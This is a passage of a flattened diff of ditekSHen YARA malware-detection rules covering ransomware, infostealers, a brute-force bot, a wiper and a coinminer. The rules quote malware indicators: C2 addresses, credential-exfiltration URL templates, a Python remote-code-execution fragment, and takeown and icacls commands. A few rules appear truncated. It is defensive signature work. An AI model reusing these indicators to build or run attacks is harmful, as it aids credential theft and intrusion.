"https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e9fc9d405b955c379ae40b1804d43b19999f6ea264fc645c897080fb020e8ae8" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7009-L7029" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1cc2aa9b672b8519a3e8a22e31403fb7adace0d430f9cab160e9a7d52e56e875" score = 75 - quality = 73 + quality = 50 tags = "FILE" strings: - $x1 = "143.198.117.43" fullword ascii - $x2 = "157.90.147.28" fullword ascii - $x3 = "//kpb3ss3vwvfejd4g3gvpvqo6ad7nnmvcqoik4mxt2376yu2adlg5fwyd.onion" ascii - $x4 = "http://lorenz" ascii - $x5 = "\\lora\\Release\\lora.pdb" ascii - $x6 = "--MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" ascii - $x7 = "/USER:'HOMEOFFICE.COM\\" ascii - $x8 = "/USER:'Sentinel.com\\" ascii - $s1 = "to->_What == nullptr && to->_DoFree == false" fullword wide - $s2 = "*it == '\\0'" fullword wide - $s3 = "process call create 'cmd.exe /c" ascii - $s4 = "\\Control Panel\\Desktop\" /V Wallpaper /T REG_SZ /F /D" ascii - $s5 = "HELP_SECURITY_EVENT.html" ascii - $s6 = "
[+] Whats Happen?" ascii - $s7 = /\.Lorenz\.sz\d+$/ fullword ascii - $s8 = "TW9Vc29Db3JlV29ya2VyLmV4ZQ==" fullword ascii - $s9 = ".Speak(\"You've been hack" ascii nocase - $s10 = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAo" ascii - $n1 = "ame_serv=" ascii - $n2 = "&ip=" ascii - $n3 = "&winver=Windows" ascii - $n4 = "&list_drive=" ascii - $n5 = "&file=" ascii + $s1 = "DeleteFile \"%s\" Failed,Err=%d" wide + $s2 = "DeleteFile \"%s\" Success" wide + $s3 = "ExcuteFile \"%s\" Failed,Err=%d" wide + $s4 = "ExcuteFile \"%s\" Success" wide + $s5 = "CreateDownLoadFile \"%s\" Failed,Error=%d" wide + $s6 = "uploadFile \"%s\" Failed,errorcode=%d" wide + $s7 = "CreateUpLoadFile \"%s\" Success" wide + $s8 = "im the king" ascii + $s9 = "dont disturb me" fullword ascii + $s10 = "kill me or love me" fullword ascii + $s11 = "please leave me alone" fullword ascii + $s12 = "calculate the NO." fullword ascii + $s13 = "\\1-driver-vmsrvc" fullword ascii condition: - uint16(0)==0x5a4d and (2 of ($x*) or 8 of ($s*) or (4 of ($n*) and 2 of them ) or (1 of ($x*) and 6 of them )) + uint16(0)==0x5a4d and 7 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Blackcat : FILE +rule DITEKSHEN_MALWARE_Win_Gobrut : FILE { meta: - description = "Detects BlackCat ransomware" + description = "Detects unknown Go multi-bruteforcer bot (StealthWorker / GoBrut) against multiple systems: QNAP, MagOcart, WordPress, Opencart, Bitrix, Postgers, MySQL, Drupal, Joomla, SSH, FTP, Magneto, CPanel" author = "ditekSHen" - id = "b6831d84-40d7-52ae-8c4d-30b087b0007b" - date = "2024-09-06" - modified = "2024-09-06" + id = "f5605123-12d9-55d1-8a32-acebf16834f8" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9267-L9289" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "cd76e5b87f33d91c17fd032417583c3f68d0e310aaf6f08e26ec5d53844ed9d2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7031-L7086" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "fb93d0dcf7f38294444ac6d2e1a7a126027ce07f0305af9ae0f8aa8f4b806c5c" score = 75 - quality = 75 + quality = 50 tags = "FILE" strings: - $x1 = "{\"config_id\":\"\",\"public_key\":\"MIIBIjANBgkqhkiG9w0BAQEFAAO" ascii - $x2 = "C:\\Users\\Public\\All Usersdeploy_note_and_image_for_all_users=" fullword ascii - $s1 = "encrypt_app::windows" ascii - $s2 = /locker::core::os::windows::(desktop_note|self_propagation|privilege_escalation|psexec|shadow_copy)/ ascii - $s3 = "uac_bypass::shell_exec=" ascii - $s4 = "-u-p-s-d-f-cpropagate::attempt=" ascii - $s5 = "masquerade_peb" ascii - $s6 = "RECOVER-${EXTENSION}-FILES.txt" ascii - $s7 = ".onion/?access-key=${ACCESS_KEY}" ascii - $s8 = "-vm-killno-vm-snapshot-killno-vm-kill-" ascii - $s9 = "esxi_vm_killenable_esxi_vm_snapshot_killstrict_" ascii - $s10 = /enum_(shares|servers)_sync::ok/ fullword ascii - $s11 = "hidden_partitions::mount_all::mounting=" ascii + $x1 = "/src/StealthWorker/Worker" ascii + $x2 = "/go/src/Cloud_Checker/" ascii + $x3 = "brutXmlRpc" ascii + $s1 = "main.WPBrut" ascii + $s2 = "main.WPChecker" ascii + $s3 = "main.WooChecker" ascii + $s4 = "main.StandartBrut" ascii + $s5 = "main.StandartBackup" ascii + $s6 = "main.WpMagOcartType" ascii + $s7 = "main.StandartAdminFinder" ascii + $w1 = "/WorkerQnap_brut/main.go" ascii + $w2 = "/WorkerHtpasswd_brut/main.go" ascii + $w3 = "/WorkerOpencart_brut/main.go" ascii + $w4 = "/WorkerBitrix_brut/main.go" ascii + $w5 = "/WorkerPostgres_brut/main.go" ascii + $w6 = "/WorkerMysql_brut/main.go" ascii + $w7 = "/WorkerFTP_brut/main.go" ascii + $w8 = "/WorkerSSH_brut/main.go" ascii + $w9 = "/WorkerDrupal_brut/main.go" ascii + $w10 = "/WorkerJoomla_brut/main.go" ascii + $w11 = "/WorkerMagento_brut/main.go" ascii + $w12 = "/WorkerWHM_brut/main.go" ascii + $w13 = "/WorkerCpanel_brut/main.go" ascii + $w14 = "/WorkerPMA_brut/main.go" ascii + $w15 = "/WorkerWP_brut/main.go" ascii + $p1 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=cpanel" ascii + $p2 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=ftpBrut" ascii + $p3 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=mysql_b" ascii + $p4 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=qnapBrt" ascii + $p5 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=OCartBrt" ascii + $p6 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=phpadmin" ascii + $p7 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=bitrixBrt" ascii + $p8 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=drupalBrt" ascii + $p9 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=joomlaBrt" ascii + $p10 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=htpasswdBrt" ascii + $p11 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=magentoBrt" ascii + $p12 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=postgres_b" ascii + $p13 = "AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=%s&USER_PASSWORD=%s&Login=&captcha_sid=&captcha_word=" ascii + $p14 = "%qlog=%s&pwd=%s&wp-submit=Log In&redirect_to=%s/wp-admin/&testcookie=1" ascii + $p15 = "name=%s&pass=%s&form_build_id=%s&form_id=user_login_form&op=Log" ascii + $p16 = "username=%s&passwd=%s&option=com_login&task=login&return=%s&%s=1" ascii + $v1_1 = "brutC" fullword ascii + $v1_2 = "XmlRpc" fullword ascii + $v1_3 = "shouldRetry$" ascii + $v1_4 = "HttpC|%" ascii + $v1_5 = "ftpH%_" ascii + $v1_6 = "ssh%po" ascii + $v1_7 = "?sevlyar/4-da" ascii condition: - ( uint16(0)==0x5a4d or uint16(0)==0x457f) and ( all of ($x*) or 5 of ($s*) or (1 of ($x*) and 3 of ($s*))) + ( uint16(0)==0x5a4d or uint16(0)==0x457f) and ((2 of ($x*) and 3 of ($s*)) or all of ($s*) or 6 of ($w*) or 6 of ($p*) or 6 of ($v1*) or 12 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Koxic : FILE +rule DITEKSHEN_MALWARE_Win_Biopass_Dropper : FILE { meta: - description = "Detects Koxic ransomware" + description = "Detects Go BioPass dropper" author = "ditekSHen" - id = "6a82bf44-b155-5746-b798-20a13623a14a" - date = "2024-09-06" - modified = "2024-09-06" + id = "56037c79-59f7-587c-8f54-c9618e871f34" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9291-L9309" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d874c8ebf330814e52d159cbf71f8bc05ebeb4a9fb93d96c3f861b51e57925a3" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7088-L7111" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "06f3b3ee38349ddcf9be7cbb7627d60fa673962409dde6e4badd112841a3ed19" score = 75 - quality = 25 + quality = 75 tags = "FILE" strings: - $c1 = " INFO: >> %TEMP%\\" ascii wide - $c2 = "cmd /c \"wmic" ascii wide - $c3 = "cmd /c \"echo" ascii wide - $c4 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"%s\"" fullword wide - $c5 = /sc config.{1,30}start=disabled/ fullword ascii wide - $s1 = "Container: %s" fullword wide - $s2 = "Shotcut dir : %s" fullword wide - $s3 = "\\Microsoft\\Windows\\Network Shortcuts\\" fullword wide - $s4 = "Thread %d started." fullword ascii - $s5 = "ADD our TOXID:" wide - $s6 = "[Recommended] Using an email" wide + $go = "Go build ID:" ascii + $s1 = "main.NetWorkStatus" ascii + $s2 = "main.NoErrorRunFunction" ascii + $s3 = "main.FileExist" ascii + $s4 = "main.execute" ascii + $s5 = "main.PsGenerator" ascii + $s6 = "main.downFile" ascii + $s7 = "main.Unzip" ascii + $url1 = "https://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/" ascii + $x1 = "SCHTASKS /Run /TN SYSTEM_CDAEMON" ascii + $x2 = "SCHTASKS /Run /TN SYSTEM_SETTINGS" ascii + $x3 = "SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST" ascii + $x4 = ".exe /install /quiet /norestart" ascii + $x5 = "exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\\''http" ascii + $x6 = "powershell.exe -Command $" ascii + $x7 = ".Path ='-----BEGIN RSA TESTING KEY-----" ascii condition: - uint16(0)==0x5a4d and ((4 of ($s*) and 1 of ($c*)) or (2 of ($s*) and (#c1>5 or #c2>5 or #c3>5 or #c5>5))) + uint16(0)==0x5a4d and ( all of ($s*) or 5 of ($x*) or (1 of ($url*) and ($go)) or 9 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Timetime : FILE +rule DITEKSHEN_MALWARE_Win_A310Logger : FILE { meta: - description = "Detects TimeTime ransomware" + description = "Detects A310Logger" author = "ditekSHen" - id = "4d6a31b5-b5a5-58e2-bfce-c40c72cda391" - date = "2024-09-06" - modified = "2024-09-06" + id = "d2cf2f7b-5710-56ab-b13d-97a70fe7f618" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9311-L9327" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c75ca595ff25f8c79bfe8e5c6af29349be8f07c2de79fd24f09b02afffb7168b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7113-L7149" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8205169c9c78eb784b9d07a5fd85ad3a54763452e1e315f7e7911b8ac49a6c01" score = 75 - quality = 75 + quality = 73 tags = "FILE" + snort_sid = "920204-920207" strings: - $s1 = "@_DECRYPTOR_@" ascii wide - $s2 = "@__RECOVER_YOUR_FILES__@" wide - $s3 = "\\TimeTime.pdb" ascii - $s4 = "runCommand" fullword ascii - $s5 = "decryptor_file_name" fullword ascii - $s6 = "encryption_hiding_process" fullword ascii - $s7 = "admin_hiding_process" fullword ascii - $s8 = "security_vaccine" fullword ascii - $s9 = "EncrFiles_Load" fullword ascii + $s1 = "Temporary Directory * for" fullword wide + $s2 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*RD_" wide + $s3 = "@ENTIFIER=" wide + $s4 = "ExecQuery" fullword wide + $s5 = "MSXML2.ServerXMLHTTP.6.0" fullword wide + $s6 = "Content-Disposition: form-data; name=\"document\"; filename=\"" wide + $s7 = "CopyHere" fullword wide + $s8 = "] Error in" fullword wide + $s9 = "shell.application" fullword wide nocase + $s10 = "SetRequestHeader" fullword wide + $s11 = "\\Ethereum\\keystore" fullword wide + $s12 = "@TITLE Removing" fullword wide + $s13 = "@RD /S /Q \"" fullword wide + $en1 = "Unsupported encryption" fullword wide + $en2 = "BCryptOpenAlgorithmProvider(SHA1)" fullword wide + $en3 = "BCryptGetProperty(ObjectLength)" fullword wide + $en4 = "BCryptGetProperty(HashDigestLength)" fullword wide + $v1_1 = "PW\\FILES\\SC::" wide + $v1_2 = "AddAttachment" fullword wide + $v1_3 = "Started:" fullword wide + $v1_4 = "Ended:" fullword wide + $v1_5 = "sharedSecret" fullword wide + $v1_6 = "\":\"([^\"]+)\"" fullword wide + $v1_7 = "\\credentials.txt" fullword wide + $v1_8 = "WritePasswords" fullword ascii + $v1_9 = "sGeckoBrowserPaths" fullword ascii + $v1_10 = "get_sPassword" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and (7 of ($s*) or (3 of ($en*) and 4 of ($s*)) or (5 of ($s*) and 1 of ($en*)) or 5 of ($v1*) or (4 of ($v1*) and 2 of ($s*) and 2 of ($en*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Strifewater : FILE +rule DITEKSHEN_MALWARE_Win_Crylock : FILE { meta: - description = "Detects StrifeWater RAT" + description = "Detects CryLock ransomware" author = "ditekSHen" - id = "69f0bd07-3e4e-5245-9c42-c3f8199b566e" - date = "2024-09-06" - modified = "2024-09-06" + id = "296288d8-2fdd-592a-aef9-7d4853885594" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9329-L9354" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ddb189dfe58af08d2c0682239551a5b9d82db94eedcefc02895316bcbbaca3f2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7151-L7186" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "dde35dd2c7e89212c4562f2dcf6a78d06fbb3d31150d49e6c48f758b07f1834f" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "example/1.0" fullword wide - $s2 = "coname:" fullword ascii - $s3 = "*elev:" fullword ascii - $s4 = "*uname:" fullword ascii - $s5 = "--BoundrySign" ascii - $s6 = "000000c:\\users\\public\\libraries\\tmp.bi" ascii - $s7 = "9c4arSBr32g6IOni" fullword ascii - $pdb = "\\win8\\Desktop\\ishdar_win8\\" ascii - $xn1 = "techzenspace.com" fullword wide - $xn2 = "87.120.8.210" wide - $xn3 = "192.168.40.27" wide - $n1 = /RVP\/index\d+\.php/ fullword wide - $n2 = "tid=%d&code=%s&fname=%s&apiData=%s" fullword ascii - $n3 = "code=%s&tid=%d&fname=%s&apiData=%s" fullword ascii - $n4 = "Content-Disposition: form-data; name=\"token\"" fullword ascii - $n5 = "Content-Disposition: form-data; name=\"apiData\"" fullword ascii - $n6 = "Content-Disposition: form-data; name=\"data\"; filename=\"" fullword ascii - $n7 = "Content-Disposition: form-data; name=\"tid\"" fullword ascii + $s1 = "Encrypted by BlackRabbit. (BR-" ascii + $s2 = "{ENCRYPTENDED}" ascii + $s3 = "{ENCRYPTSTART}" ascii + $s4 = "<%UNDECRYPT_DATETIME%>" ascii + $s5 = "<%RESERVE_CONTACT%>" ascii + $s6 = "how_to_decrypt.hta" ascii wide + $s7 = "END ENCRYPT ONLY EXTENATIONS" ascii + $s8 = "END UNENCRYPT EXTENATIONS" ascii + $s9 = "END COMMANDS LIST" ascii + $s10 = "END PROCESSES KILL LIST" ascii + $s11 = "END SERVICES STOP LIST" ascii + $s12 = "END PROCESSES WHITE LIST" ascii + $s13 = "END UNENCRYPT FILES LIST" ascii + $s14 = "END UNENCRYPT FOLDERS LIST" ascii + $s15 = "Encrypted files:" ascii + $s16 = { 65 78 74 65 6e 61 74 69 6f 6e 73 00 ff ff ff ff + 06 00 00 00 63 6f 6e 66 69 67 00 00 ff ff ff ff + (0a|0d 0a) 00 00 00 63 6f 6e 66 69 67 2e 74 78 + 74 00 00 ff ff ff ff 03 00 00 00 68 74 61 } + $p1 = "-exclude" fullword + $p2 = "-makeff" fullword + $p3 = "-full" fullword + $p4 = "-nolocal" fullword + $p5 = "-nolan" fullword + $p6 = "\" -id \"" fullword + $p7 = "\" -wid \"" fullword + $p8 = "\"runas\"" fullword + $p9 = " -f -s -t 00" fullword ascii condition: - uint16(0)==0x5a4d and (2 of ($xn*) or 6 of ($s*) or 6 of ($n*) or (1 of ($xn*) and 4 of them ) or ($pdb and 4 of them ) or (3 of ($s*) and 3 of ($n*))) + uint16(0)==0x5a4d and (3 of ($s*) or 6 of ($p*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Surtr : FILE +rule DITEKSHEN_MALWARE_Win_Deeprats : FILE { meta: - description = "Detects Surtr ransomware. Ransom note is similar to LockFile" + description = "Detects DeepRats (" author = "ditekSHen" - id = "7a31415d-5c03-5537-9adb-65e637f9fa0e" - date = "2024-09-06" - modified = "2024-09-06" + id = "5b774e24-3864-519f-9cfd-d729d7d567a0" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9356-L9378" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a8db5588079d471d8904f0444973973a0c01dbec1ccbe3d43a34d41a0dde495d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7188-L7218" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "511264c0b6932f90069a5206cd142ca7210b0bc40c51ef5aa9c41a161fb57aab" score = 75 - quality = 75 + quality = 73 tags = "FILE" + hash1 = "1f8b7e1b14869d119c5de1f05330094899bd997fca4c322d852db85cbd9271e6" strings: - $s1 = "SurtrRansomware" ascii - $s2 = "4)) } import "pe" -rule DITEKSHEN_MALWARE_Linux_Buhti : FILE +rule DITEKSHEN_MALWARE_Win_Breakwin : FILE { meta: - description = "Detects Buhti Ransomware" + description = "Detects BreakWin Wiper" author = "ditekSHen" - id = "a50b8c34-e9e2-5466-80a1-b0ab805c68be" - date = "2024-09-06" - modified = "2024-09-06" + id = "4ffadbfa-c1cc-59e6-a9ba-7a34eca6c3fe" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9630-L9643" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1bab3202dbeaf088b233c3ab1056c357d156b7eef3111bea997b1c610a27f561" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7453-L7471" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "86fc89e28fc107c2d4fe98dc16048d9e076b1fef53a3df0814f80a88bbe09c48" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "buhtiRansom" ascii - $x2 = "://satoshidisk.com/pay/" ascii - $s1 = "main.encrypt_file" fullword ascii - $s2 = "/path/to/be/encrypted" ascii - $s3 = "Restore-My-Files.txt" ascii - $s4 = ".buhti390625" ascii + $s1 = "Started wiping file %s with %s." fullword wide + $s2 = "C:\\Program Files\\Lock My PC" wide + $s3 = "Stardust is still alive." fullword wide + $s4 = "Failed to terminate the locker process." fullword wide + $s5 = "C:\\Windows\\System32\\cmd.exe" fullword wide + $s6 = "Process created successfully. Executed command: %s." fullword wide + $s7 = "locker_background_image_path" fullword ascii + $s8 = "takeown.exe /F \"C:\\Windows\\Web\\Screen\" /R /A /D Y" fullword ascii + $s9 = "icacls.exe \"C:\\Windows\\Web\\Screen\" /reset /T" fullword ascii + $s10 = "takeown.exe /F \"C:\\ProgramData\\Microsoft\\Windows\\SystemData\" /R /A /D Y" fullword ascii + $s11 = ".?AVProcessSnapshotCreationFailedException@@" fullword ascii condition: - uint16(0)==0x457f and ( all of ($x*) or (1 of ($x*) and 3 of ($s*)) or 5 of them ) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Commonmagic : FILE +rule DITEKSHEN_MALWARE_Win_Coinminer03 : FILE { meta: - description = "Detects CommonMagic and Modules" + description = "Detects coinmining malware" author = "ditekSHen" - id = "cbebe334-9b66-5931-8f92-25d080f7fd6a" - date = "2024-09-06" - modified = "2024-09-06" + id = "e0e57557-7c46-5336-b904-c4c1f142bd81" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9645-L9660" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e94ba53f31f3effe12b1fbaca19fea59c0e12f742f6fc0af2a0a679bf4299cbe" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7506-L7528" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f22e1af955a0d132dda820fe5e5e1ae2f077b7264ce1f0125a2f37c0da6b6508" score = 75 quality = 75 tags = "FILE" strings: - $p1 = "\\\\.\\pipe\\PipeMd" wide - $p2 = "\\\\.\\pipe\\PipeCrDtMd" wide - $p3 = "\\\\.\\pipe\\PipeDtMd" wide - $s1 = "graph.microsoft.com" fullword wide - $s2 = "CreateNamedPipe" ascii - $s3 = "\\CommonCommand\\" wide - $ua1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36" wide - $ua2 = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136" wide + $s1 = "UnVzc2lhbiBTdGFuZGFyZCBUaW1l" wide + $s2 = "/xmrig" wide + $s3 = "/gminer" wide + $s4 = "-o {0} -u {1} -p {2} -k --cpu-priority 0 --threads={3}" wide + $s5 = "--algo ethash --server" wide + $s6 = "--algo kawpow --server" wide + $cnc1 = "/delonl.php?hwid=" fullword wide + $cnc2 = "/gateonl.php?hwid=" fullword wide + $cnc3 = "&cpuname=" fullword wide + $cnc4 = "&gpuname=" fullword wide + $cnc5 = "{0}/gate.php?hwid={1}&os={2}&cpu={3}&gpu={4}&dateinstall={5}&gpumem={6}" fullword wide + $cnc6 = "/del.php?hwid=" fullword wide + $f1 = "b__" ascii + $f2 = "b__" ascii + $f3 = "b__" ascii condition: - uint16(0)==0x5a4d and (2 of ($p*) and 1 of ($s*)) or (1 of ($ua*) and 1 of ($s*) and 1 of ($p*)) + uint16(0)==0x5a4d and (3 of ($cnc*) or (2 of ($f*) and (1 of ($s*) or 1 of ($f*))) or all of ($f*) or 5 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Greetingghoul : FILE +rule DITEKSHEN_MALWARE_Win_Zeppelin : FILE { meta: - description = "Detects GreetingGhoul Cryptocurrency Infostealer" + description = "Detects Zeppelin (Delphi) ransomware" author = "ditekSHen" - id = "42791b26-1cda-5bf3-b955-9de2dda1d63b" - date = "2024-09-06" - modified = "2024-09-06" + id = "368d0c31-745d-50ad-a265-50561fdc822a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9662-L9679" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5a2635066df031ba6e291c3ba14f9ed85bf3247c82c66eb1b3d3618fdebb47a6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7530-L7545" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f6c8420756b562662985dd26eaad58500a24cae786a47b788c953e86276116a1" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "peer_list" fullword ascii - $s2 = "seed_hash" fullword ascii - $s3 = "pool_id" fullword ascii - $s4 = "%smutex=%s:%lu" ascii - $s5 = "miner.cfg" fullword ascii - $s6 = "{\"method\": \"%s\"%s}" ascii - $s7 = "/app/manager/%s" ascii - $s8 = "X-VNC-STATUS" fullword ascii - $s9 = "%s\\%lu.zip" fullword ascii - $s10 = "\\??\\%programdata%\\" wide + $s1 = "TUnlockAndEncrypt" ascii + $s2 = "TExcludeFiles" ascii + $s3 = "TExcludeFolders" ascii + $s4 = "TDrivesAndShares" ascii + $s5 = "TTaskKiller" ascii + $x1 = "!!! D !!!" ascii + $x2 = "!!! LOCALPUBKEY !!!" ascii + $x3 = "!!! ENCLOCALPRIVKEY !!!" ascii condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and ( all of ($s*) or all of ($x*) or (2 of ($x*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Multi_Family_Infostealer : FILE +rule DITEKSHEN_MALWARE_Win_Slackbot : FILE { meta: - description = "Detects Prynt, WorldWind, DarkEye, Stealerium and ToxicEye / TelegramRAT infostealers" + description = "Detects SlackBot" author = "ditekSHen" - id = "960830ba-df0d-539d-be2a-7778229f79bd" - date = "2024-09-06" - modified = "2024-09-06" + id = "cd540aa2-dc8f-5ccc-b66c-a8d72b73c896" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L9681-L9703" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0fdd1cdc4f2e5bee6c763e6e6b2e79d85285e44e2b5e3168a56d7d360252ee99" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L7547-L7588" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "919839883c437b69cf7f380830f2499be24415f96f1e42424e4859114f958581" score = 75 quality = 73 tags = "FILE" strings: - $n1 = /Prynt|WorldWind|DarkEye(\s)?Stealer/ ascii wide - $n2 = "Stealerium" ascii wide - $x1 = "@FlatLineStealer" ascii wide - $x2 = "@CashOutGangTalk" ascii wide - $x3 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii - $x4 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii - $s1 = "Timeout /T 2 /Nobreak" fullword wide - $s2 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide - $s3 = "Downloading file: \"{file}\"" wide - $s4 = "/bot{0}/getUpdates?offset={1}" wide - $s5 = "send command to bot!" wide - $s6 = " *Keylogger " fullword wide - $s7 = "*Stealer" wide - $s8 = "Bot connected" wide - $s9 = "### {0} ### ({1})" wide + $x1 = "lp0o4bot v" ascii + $x2 = "slackbot " ascii + $s1 = "cpu: %lumhz %s, uptime: %u+%.2u:%.2u, os: %s" fullword ascii + $s2 = "%s, running for %u+%.2u:%.2u" fullword ascii + $s3 = "PONG :%s" fullword ascii + $s4 = 